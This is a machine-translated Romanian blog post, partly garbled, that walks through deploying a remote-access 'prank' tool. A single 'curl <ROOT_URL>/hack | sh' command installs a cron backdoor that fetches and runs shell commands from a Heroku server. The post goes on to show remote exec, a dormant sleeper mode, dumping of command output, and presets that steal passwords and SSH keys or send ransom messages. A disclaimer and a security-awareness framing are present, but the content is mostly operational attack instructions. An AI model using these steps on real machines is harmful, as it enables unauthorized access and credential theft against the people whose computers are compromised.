de Chet Corcos

Cum să-ți spori prietenii

Cum sa ti spori prietenii

Prietenii mei își lasă deseori computerele deschise și deblocate. Le spun că probabil ar trebui să se obișnuiască să-și blocheze computerele, dar nu mă ascultă. Așa că am creat un proiect simplu pentru a-mi hack prietenii și a le arăta importanța securității computerului.

Tot ce trebuie să fac este să aștept să își lase computerul deblocat pentru câteva secunde, să-și deschidă terminalul și să tastați o singură comandă scurtă.

Cum sa ti spori prietenii

Asta e! Computerul lor este acum infectat și pot rula orice comandă doresc pe acest computer de la distanță. Destul de dulce, nu? Sau poate șocant?

Hackingul este ilegal. Specific:

„Acces intenționat[ing] un computer fără autorizare sau depășește[ing] acces autorizat ”- The Computer Fraud and Abuse Act (18 USC 1030)

Așadar, rețineți că scopul acestui articol este să vă arăt cât de ușor ar fi pentru cineva cu intenții proaste să vă pirateze, astfel încât să puteți evita să fiți piratat.

Nu este nevoie de un geniu al hackerilor pentru a vă distruge viața – orice „script kiddy” care poate avea acces fizic la computerul dvs. vă poate compromite descărcând un script care conține doar 50 de linii de cod.

Instalare

Tot codul acestui proiect trăiește acest depozit dacă doriți să intrați chiar înăuntru, dar vă explic cum funcționează totul mai jos.

Mai întâi, trebuie doar să clonați repo, să instalați dependențele sale și să conectați simbolul hack instrument de interfață linie de comandă (CLI).

git clone https://github.com/ccorcos/hack.gitgit remote remove origincd hacknpm installnpm link

Apoi, trebuie să configurați Heroku pentru a găzdui scripturile care vor fi rulate pe computerul prietenilor dvs. Dacă nu ați folosit niciodată Heroku până acum, înscrie-te aici (este gratuit!) și configurați instrumentul CLI pe mașina dvs.

brew install heroku-toolbeltheroku login

Acum în interiorul hack repo, creați o aplicație Heroku cu un nume ușor de reținut. eu folosesc hacker-chet.

heroku create hacker-chet

Apoi, trebuie să executați o comandă pentru a face o mică configurare. Tot ce face cu adevărat este să obțineți adresa URL rădăcină pentru site-ul dvs. Heroku și să o introduceți în pachet.json. În acest fel, serverul poate injecta adresa URL a aplicației în scripturile shell.

npm run init

Puteți porni serverul la nivel local dacă doriți să vă piratați și să testați lucrurile.

npm start

Sau puteți implementa pe Heroku.

npm run deploy

Acum sunteți gata să hack!

Hack API

Frumusețea acestui program este că, pentru a începe piratarea cuiva, trebuie doar să rulați o singură comandă pe mașina lor.

curl <ROOT_URL>/hack | sh

ROOT_URL este calea specifică către aplicația dvs. Când rulați serverul local, acesta va fi localhost: 5000 iar atunci când vă instalați pe Heroku, va fi ceva de genul .herokuapp.com.

Ceea ce face acest lucru este să stabilească un job cron – un „job cronologic” care să ruleze din nou sarcini în anumite momente – pentru a face ping la / env / live punctul final în fiecare minut și transmite rezultatul la SH. De fapt, este destul de simplu! Și Heroku vă oferă HTTPS gratuit, deci este „sigur”, nu?

După ce ți-ai piratat prietenul, poți face orice altceva cu instrumentul pentru linia de comandă de pe computer.

hack instrumentul are un concept de diferite medii piratate. Când hackezi pe cineva folosind / hack punctul final, acea persoană începe în Trăi mediu inconjurator. Și pentru fiecare mediu, puteți rula o varietate de comenzi diferite. Voi demonstra totul cu o mică soluție.

Următoarele vor rescrie fișierul Trăi script shell de mediu pentru a executa următoarea comandă care va spune cu voce tare „te urmăresc”.

hack live exec "say 'I'm watching you'"

Ei bine, nu va funcționa încă, trebuie totuși să vă re-implementați în aplicația Heroku.

hack deploy
1611666666 966 Cum sa ti spori prietenii

Acum așteptați următorul minut și urmăriți computerul prietenului dvs. ping pe serverul dvs., urmărind jurnalele serverului.

hack logs
1611666666 508 Cum sa ti spori prietenii

Întregul punct al mediului este astfel încât să puteți hack mai multe persoane în același timp. Pentru a izola oamenii în medii diferite, trebuie doar să schimbați numele.

hack live rename jon

Data viitoare când mediul live este ping, va rescrie jobul cron pentru a începe ping-ul jon mediu în schimb.

1611666666 7 Cum sa ti spori prietenii

Puteți face totul la fel doar schimbând argumentul de mediu.

hack jon exec "say 'hello jon'"

Acum, dacă v-ați distrat suficient pentru ziua respectivă și petrecerea sa încheiat, puteți a uita Jon și asigură-l că l-ai „descătușat”.

hack jon forget

Aceasta va șterge lucrarea cron de pe computerul lor. Sau s-ar putea să doriți doar să puneți acest mediu în modul Sleeper-Cell pentru a-l putea recupera mai târziu.

hack jon interval 1d

Acum, mai degrabă decât ping serverul dvs. în fiecare minut (implicit), va face ping în fiecare zi la miezul nopții. Și când doriți să o treziți înapoi, puteți schimba intervalul înapoi la fiecare minut și a doua zi, sunteți bine să plecați!

hack jon interval 1m

Câteva alte lucruri distractive de făcut sunt configurarea unor joburi cron suplimentare. Iată cum vă puteți trezi prietenul la 6 dimineața în fiecare dimineață pentru a-i aminti despre securitatea computerului.

hack jon cron "0 6 * * * say 'good morning jon, remember what I told you about locking your computer?'"

PS Dacă nu vă amintiți cum funcționează joburile cron, aceasta este o resursă excelentă. Aproape totul se reduce la această mică diagramă.

* * * * *| | | | || | | | || | | | +---- Day of the Week   (range: 1-7, 1 standing for Monday)| | | +------ Month of the Year (range: 1-12)| | +-------- Day of the Month  (range: 1-31)| +---------- Hour              (range: 0-23)+------------ Minute            (range: 0-59)

Unul dintre preferatele mele este desktop presetare care va descărca o imagine de la o anumită adresă URL și o va seta ca fotografie de fundal.

hack jon preset desktop http://i.imgur.com/5FC2r9R.jpg

Și dacă ați scris o grămadă de joburi cron și nu mai știți ce este acolo, puteți utiliza comanda dump.

hack jon dump "crontab -l"

Acum biciuiți jurnalele și veți vedea rezultatul pe următorul ping. Acest lucru este de fapt mult mai sinistru acum că puteți obține informații înapoi. Dacă doriți să fiți mai nefast, puteți căuta parole decriptate sau le puteți fura cheile ssh.

hack jon preset passwordshack jon preset ssh

Dar dacă vreți doar să-i dați o sperietură de modă veche, trimiteți-i un mesaj de răscumpărare!

hack jon preset ransom "Hello Jon, I told you not to leave your computer unlocked."
1611666667 839 Cum sa ti spori prietenii

În cele din urmă, dacă adăugați o grămadă de joburi cron și doriți doar să o luați de la capăt, resetarea este aici pentru a vă ajuta.

hack jon reset

Acum, du-te distractiv (responsabil) cu acest lucru și anunță-mă cu care sunt farsele tale preferate trimiterea unei cereri de tragere cu o nouă comandă sau presetare!

Hacking fericit!